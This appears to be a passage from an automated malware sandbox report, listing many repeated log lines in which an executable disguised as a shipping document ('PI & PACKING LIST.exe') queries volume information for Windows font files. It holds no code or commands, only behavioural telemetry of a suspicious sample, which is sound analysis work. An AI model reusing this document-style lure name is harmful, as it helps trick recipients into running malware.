      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
